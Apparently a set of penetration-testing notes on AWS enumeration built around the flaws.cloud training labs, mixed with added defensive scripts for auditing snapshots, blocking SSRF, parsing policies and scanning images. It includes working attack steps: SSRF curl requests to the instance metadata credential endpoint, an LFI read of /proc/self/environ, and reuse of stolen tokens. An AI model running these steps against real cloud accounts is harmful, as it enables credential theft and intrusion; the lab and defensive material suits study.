2. AWS Enumeration Process

0. Steps

Google Dorking
Github Repos
Pivot from compromised computer with AWS Keys
Pivot from compromised AWS environment.

1. Step

dig +nocmd flaws.cloud any +multiline +noall +answer

dig <DNS>

nslookup <ip> 

aws s3 ls s3://flaws.cloud --no-sign-request


1.1 Attacking EC2

AWS allows you to take snapshots of EC2 volumes and databases (RDS). Look for credentials left behind in those backups.

  1. Get credentials
  2. Get the account ID
     aws --profile flaws sts get-caller-identity
  3. Get snapshot and volume info
     1. Snapshots can be copied across regions.
     2. A volume must be created in the same region as the snapshot.
     aws --profile mine ec2 describe-snapshots --owner-ids 975426262029
  4. Get permission info (who is allowed to create a volume from the snapshot)
     aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile flaws
  5. Create a volume in my account from the snapshot
     aws ec2 create-volume --availability-zone us-west-2c --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89 --profile mine
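The defender-side counterpart of step 4 is to run describe-snapshot-attribute over your own snapshots and flag the ones that are public or shared outside your accounts. The script below is an added example, not part of these notes: it consumes the JSON that the CLI prints for the createVolumePermission attribute (the real output shape is a CreateVolumePermissions list whose entries are either {"Group": "all"} or {"UserId": ...}). The sample documents, snapshot IDs, account IDs and the TRUSTED_ACCOUNTS set are constructed placeholders.

```python
"""Audit EC2 snapshot sharing from `describe-snapshot-attribute` output.

Added example (not from the original notes). Flags snapshots that are
public (Group "all") or shared with accounts outside a trusted set.
"""
import json

# Assumption: the account IDs that may legitimately receive shared snapshots.
# These are constructed placeholders, not real accounts.
TRUSTED_ACCOUNTS = {"111111111111"}


def classify_snapshot(attr_doc: dict, trusted=TRUSTED_ACCOUNTS) -> dict:
    """Return a finding for one describe-snapshot-attribute document."""
    perms = attr_doc.get("CreateVolumePermissions", [])
    public = any(p.get("Group") == "all" for p in perms)
    shared_with = {p["UserId"] for p in perms if "UserId" in p}
    untrusted = sorted(shared_with - set(trusted))
    if public:
        severity = "HIGH"     # any AWS account can create a volume from it
    elif untrusted:
        severity = "MEDIUM"   # shared with an account outside the trusted set
    else:
        severity = "OK"
    return {
        "snapshot_id": attr_doc.get("SnapshotId"),
        "public": public,
        "untrusted_accounts": untrusted,
        "severity": severity,
    }


def audit(attr_docs, trusted=TRUSTED_ACCOUNTS):
    """Classify every document and keep only the ones needing attention."""
    findings = [classify_snapshot(d, trusted) for d in attr_docs]
    return [f for f in findings if f["severity"] != "OK"]


# Constructed sample output, in the shape the CLI returns (IDs are placeholders).
SAMPLE_DOCS = [
    json.loads('{"SnapshotId": "snap-0000000000000aaaa", '
               '"CreateVolumePermissions": [{"Group": "all"}]}'),
    json.loads('{"SnapshotId": "snap-0000000000000bbbb", '
               '"CreateVolumePermissions": [{"UserId": "111111111111"}]}'),
    json.loads('{"SnapshotId": "snap-0000000000000cccc", '
               '"CreateVolumePermissions": [{"UserId": "222222222222"}]}'),
    json.loads('{"SnapshotId": "snap-0000000000000dddd", '
               '"CreateVolumePermissions": []}'),
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_DOCS):
        print(json.dumps(finding))
```

To feed it real data, loop over the snapshot IDs from `aws ec2 describe-snapshots --owner-ids self` and pipe each describe-snapshot-attribute result into classify_snapshot; the public case alone can also be listed directly with `aws ec2 describe-snapshots --owner-ids self --restorable-by-user-ids all`.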

1.2 Steal EC2 Metadata credential via SSRF

The metadata service can be accessed from EC2 instances at the following addresses using the Instance Metadata Service (IMDS):

http://169.254.169.254/latest/meta-data/

http://[fd00:ec2::254]/latest/meta-data/

OR try LFI through the same proxy:
http://container.target.flaws2.cloud/proxy/file:///proc/self/environ
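The proxy endpoint above is the kind of server-side fetch feature that turns into an SSRF path to IMDS. As an added example (not from these notes or from flaws.cloud), here is the target check such a proxy should apply before fetching: it rejects the file:// scheme (the LFI variant above), the IMDS addresses listed above, the container credential endpoint 169.254.170.2 (covered by the link-local range) and loopback, and it re-checks the address the proxy actually resolved so that a hostname pointing at a blocked address is caught too. Function and constant names are this example's own.

```python
"""Reject proxy/fetch targets that reach instance metadata or local files.

Added example (not from the original notes). check_target() is meant to be
called by a server-side fetch/proxy feature before it connects.
"""
import ipaddress
from typing import Optional, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # file:// and friends are rejected outright

# Networks a user-supplied URL must never reach from inside the instance.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("169.254.0.0/16"),    # IPv4 link-local: IMDS and 169.254.170.2
    ipaddress.ip_network("fd00:ec2::254/128"),  # IPv6 IMDS endpoint
    ipaddress.ip_network("127.0.0.0/8"),        # loopback
    ipaddress.ip_network("::1/128"),
]


def _blocked_address(candidate: str) -> Optional[str]:
    """Return the address as a string if it is an IP literal in a blocked range."""
    try:
        addr = ipaddress.ip_address(candidate)
    except ValueError:
        return None  # a hostname, not an IP literal; the resolved IP covers it
    # ::ffff:169.254.169.254 is still IMDS; compare the embedded IPv4 address.
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    if any(addr in net for net in BLOCKED_NETWORKS):
        return str(addr)
    return None


def check_target(url: str, resolved_ip: Optional[str] = None) -> Tuple[bool, str]:
    """Return (allowed, reason) for a user-supplied URL.

    `resolved_ip` is the address the proxy is about to connect to, passed in
    after DNS resolution; validating only the literal hostname is not enough.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if host == "localhost":
        return False, "loopback host"
    for candidate in (host, resolved_ip):
        if candidate is None:
            continue
        hit = _blocked_address(candidate)
        if hit:
            return False, f"{hit} is in a blocked network"
    return True, "ok"


if __name__ == "__main__":
    for u in ("http://169.254.169.254/latest/meta-data/",
              "http://[fd00:ec2::254]/latest/meta-data/",
              "file:///proc/self/environ",
              "https://example.com/page"):
        print(u, check_target(u))
```

A blocklist like this is only the second layer: the primary mitigation is requiring IMDSv2 on the instance (`aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-put-response-hop-limit 1`), which makes a plain GET through a proxy return nothing because the session token must first be obtained with a PUT.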




1.2.1 Steps

  1. Gather user info from IMDS
     https://hackingthe.cloud/aws/exploitation/ec2-metadata-ssrf/
     # curl <web address>/proxy/<IMDS address>, e.g.
     curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/

     For containers, the credential endpoint is:
     169.254.170.2/v2/credentials/

     http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/
     ALSO try the role name returned by the previous listing:
     http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/<role_name>/

  2. Create a profile with the retrieved credentials (the session token is not prompted for by `aws configure`, so set it separately on the same profile)
     > aws configure --profile <new user>
     > aws configure set aws_session_token <SESSIONTOKENHERE> --profile <new user>

## Update profiles
~/.aws/credentials

## Access the hidden folder
aws s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud --profile flaws5

1.3 Custom Policy

# Create a target user
$ aws configure --profile <new user>

# Check user
aws --profile <new user> iam get-user

# Check user policy
aws --profile <new user> iam list-attached-user-policies --user-name Level6

OR 
cloudfox --> check permission.csv

# Get policy info and version info
aws --profile flaws6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways

# View a specific version
aws --profile flaws6 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
## A restapis resource indicates an API Gateway REST API, which here fronts a Lambda


# get Lambda policy
aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6



# List Lambda functions
aws --profile flaws6 lambda list-functions --region us-west-2

# Get the specific function info
aws --profile flaws6 lambda get-policy --region us-west-2 --function-name Level6

# OR Check cloudfox
resource-trusts or lambda

# Based on the previous command's output, s33ppypa75 is the REST API ID.
"Resource": "arn:aws:apigateway:us-west-2::/restapis/*"

arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6

# Search for other policy
aws --profile flaws6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75"

ARN = Amazon Resource Names
https://docs.aws.amazon.com/IAM/latest/UserGuide/reference-arns.html

arn:partition:service:region:account-id:resource-type/resource-id
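Both the policy-version review above and the ARN format reduce to the same two operations: splitting an ARN into its fields and walking a policy document's Statement list. The script below is an added example, not from these notes or from AWS: parse_arn() follows the format in the linked reference, including the cases seen on this page (an apigateway ARN with an empty account ID, an execute-api resource that contains '/'), and summarise_policy() flags wildcard actions and resources in the Allow statements of a get-policy-version document. The policy document embedded below is constructed for the example.

```python
"""Parse ARNs and summarise an IAM policy document.

Added example (not from the original notes). The ARN format is
arn:partition:service:region:account-id:resource, where only the first five
':' separators are structural; the resource part may contain ':' or '/'.
"""
from typing import Dict, List


def parse_arn(arn: str) -> Dict[str, str]:
    """Split an ARN into named components; raises ValueError on bad input."""
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn":
        raise ValueError(f"not an ARN: {arn!r}")
    _, partition, service, region, account, resource = parts
    # Region and account may legitimately be empty (IAM has no region,
    # apigateway ARNs carry no account ID).
    return {
        "partition": partition,
        "service": service,
        "region": region,
        "account": account,
        "resource": resource,  # service-specific layout, left whole
    }


def _as_list(value) -> List[str]:
    """IAM allows a string or a list for Action and Resource."""
    return [value] if isinstance(value, str) else list(value)


def summarise_policy(doc: dict) -> List[dict]:
    """One row per Allow statement: actions, resources and wildcard flags."""
    rows = []
    for st in doc.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        actions = _as_list(st.get("Action", []))
        resources = _as_list(st.get("Resource", []))
        rows.append({
            "actions": actions,
            "resources": resources,
            "wildcard_action": any(a == "*" or a.endswith(":*") for a in actions),
            "wildcard_resource": any(r == "*" or r.endswith("/*") for r in resources),
            "services": sorted({parse_arn(r)["service"]
                                for r in resources if r.startswith("arn:")}),
        })
    return rows


# Constructed policy document in the shape returned by get-policy-version
# (under .PolicyVersion.Document). Resources reuse the ARNs from these notes.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["apigateway:GET"],
         "Resource": "arn:aws:apigateway:us-west-2::/restapis/*"},
        {"Effect": "Allow", "Action": "lambda:ListFunctions", "Resource": "*"},
        {"Effect": "Deny", "Action": "iam:*", "Resource": "*"},
    ],
}

if __name__ == "__main__":
    print(parse_arn("arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"))
    for row in summarise_policy(SAMPLE_POLICY):
        print(row)
```

A row with wildcard_resource set and a broad action list is the first thing to tighten when reviewing a policy like list_apigateways above; the services field tells you which enumeration commands (apigateway, lambda, ...) the statement enables.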

1.4 Credentials

EC2 : Metadata service 169.254.169.254
Lambda : Environment variables

1.5 Elastic Container Registry (ECR)

Amazon Elastic Container Registry (Amazon ECR) is a fully managed container registry offering high-performance hosting, so you can reliably deploy application images and artifacts anywhere.

$  aws ecr help

$  aws sts get-caller-identity --profile flaws2

$ aws ecr describe-images --profile flaws2 --repository-name level2

$ aws ecr list-images --profile flaws2 --repository-name level2 

$ aws ecr list-images --repository-name level2 --registry-id 653711331788


OPTION 1: Docker
# Log in with a registry token; piping it through --password-stdin keeps it out of the shell history
aws ecr get-login-password --profile <user> | docker login --username AWS --password-stdin 653711331788.dkr.ecr.us-east-1.amazonaws.com

docker pull 653711331788.dkr.ecr.us-east-1.amazonaws.com/level2:latest

# Then inspect the pulled image and its layer history
docker image ls
docker inspect <Image ID>
docker image history <Image ID> --no-trunc

OPTION 2: AWS CLI
aws sts get-caller-identity --profile flaws2

aws ecr batch-get-image --repository-name level2 --registry-id 653711331788 --image-ids imageTag=latest --profile flaws2|jq '.images[].imageManifest|fromjson'


aws ecr get-download-url-for-layer --repository-name level2 --layer-digest "sha256:2d73de35b78103fa305bd941424443d520524a050b1e0c78c488646c0f0a0621" --profile flaws2
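The jq step above works around the fact that batch-get-image returns imageManifest as a JSON string embedded in JSON. The script below is an added example, not from these notes: layer_digests() decodes that manifest and lists the layer digests you would pass to get-download-url-for-layer, and scan_history() applies the check a defender wants on their own images, whether any layer's build command (as shown by `docker image history --no-trunc`) baked a credential-looking environment variable into the image. The batch-get-image document, the digests and the history rows are constructed samples; SECRET_ENV_PATTERN is this example's own heuristic.

```python
"""Unpack `aws ecr batch-get-image` output and scan image history for secrets.

Added example (not from the original notes). Digests and values below are
constructed placeholders.
"""
import json
import re
from typing import List

# Heuristic: environment variable names that should never be set in a layer.
SECRET_ENV_PATTERN = re.compile(
    r"\b(AWS_ACCESS_KEY_ID|AWS_SECRET_ACCESS_KEY|AWS_SESSION_TOKEN"
    r"|[A-Z0-9_]*(?:PASSWORD|SECRET|TOKEN|API_KEY))="
)


def layer_digests(batch_get_image_output: dict) -> List[str]:
    """Return the layer digests from every image in a batch-get-image result."""
    digests = []
    for image in batch_get_image_output.get("images", []):
        manifest = json.loads(image["imageManifest"])  # double-encoded JSON
        digests.extend(layer["digest"] for layer in manifest.get("layers", []))
    return digests


def scan_history(history_entries: List[dict]) -> List[dict]:
    """Flag history rows whose CreatedBy command sets a secret-looking variable.

    Each entry carries the ID and CreatedBy fields of one
    `docker image history --no-trunc` row.
    """
    findings = []
    for entry in history_entries:
        m = SECRET_ENV_PATTERN.search(entry.get("CreatedBy", ""))
        if m:
            findings.append({"layer": entry.get("ID"), "variable": m.group(1)})
    return findings


# Constructed batch-get-image output (registry ID and digests are placeholders).
SAMPLE_BATCH_GET_IMAGE = {
    "images": [{
        "registryId": "000000000000",
        "repositoryName": "level2",
        "imageId": {"imageTag": "latest", "imageDigest": "sha256:" + "a" * 64},
        "imageManifest": json.dumps({
            "schemaVersion": 2,
            "mediaType": "application/vnd.docker.distribution.manifest.v2+json",
            "config": {"mediaType": "application/vnd.docker.container.image.v1+json",
                       "size": 1234, "digest": "sha256:" + "b" * 64},
            "layers": [
                {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
                 "size": 100, "digest": "sha256:" + "c" * 64},
                {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
                 "size": 200, "digest": "sha256:" + "d" * 64},
            ],
        }),
    }],
    "failures": [],
}

# Constructed history rows in the style of `docker image history --no-trunc`.
SAMPLE_HISTORY = [
    {"ID": "<missing>", "CreatedBy": "/bin/sh -c #(nop)  ENV AWS_SECRET_ACCESS_KEY=PLACEHOLDER"},
    {"ID": "sha256:" + "e" * 64, "CreatedBy": "/bin/sh -c apt-get update && apt-get install -y curl"},
    {"ID": "<missing>", "CreatedBy": "/bin/sh -c #(nop)  ENV DB_PASSWORD=placeholder"},
    {"ID": "<missing>", "CreatedBy": "/bin/sh -c #(nop)  ENV PATH=/usr/local/bin:/usr/bin"},
]

if __name__ == "__main__":
    print(layer_digests(SAMPLE_BATCH_GET_IMAGE))
    print(scan_history(SAMPLE_HISTORY))
```

Secrets set with ENV persist in the image config even if a later layer unsets them, so a hit from scan_history() means rotating the credential, not just rebuilding the image.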






2. Tools

AWS -Tools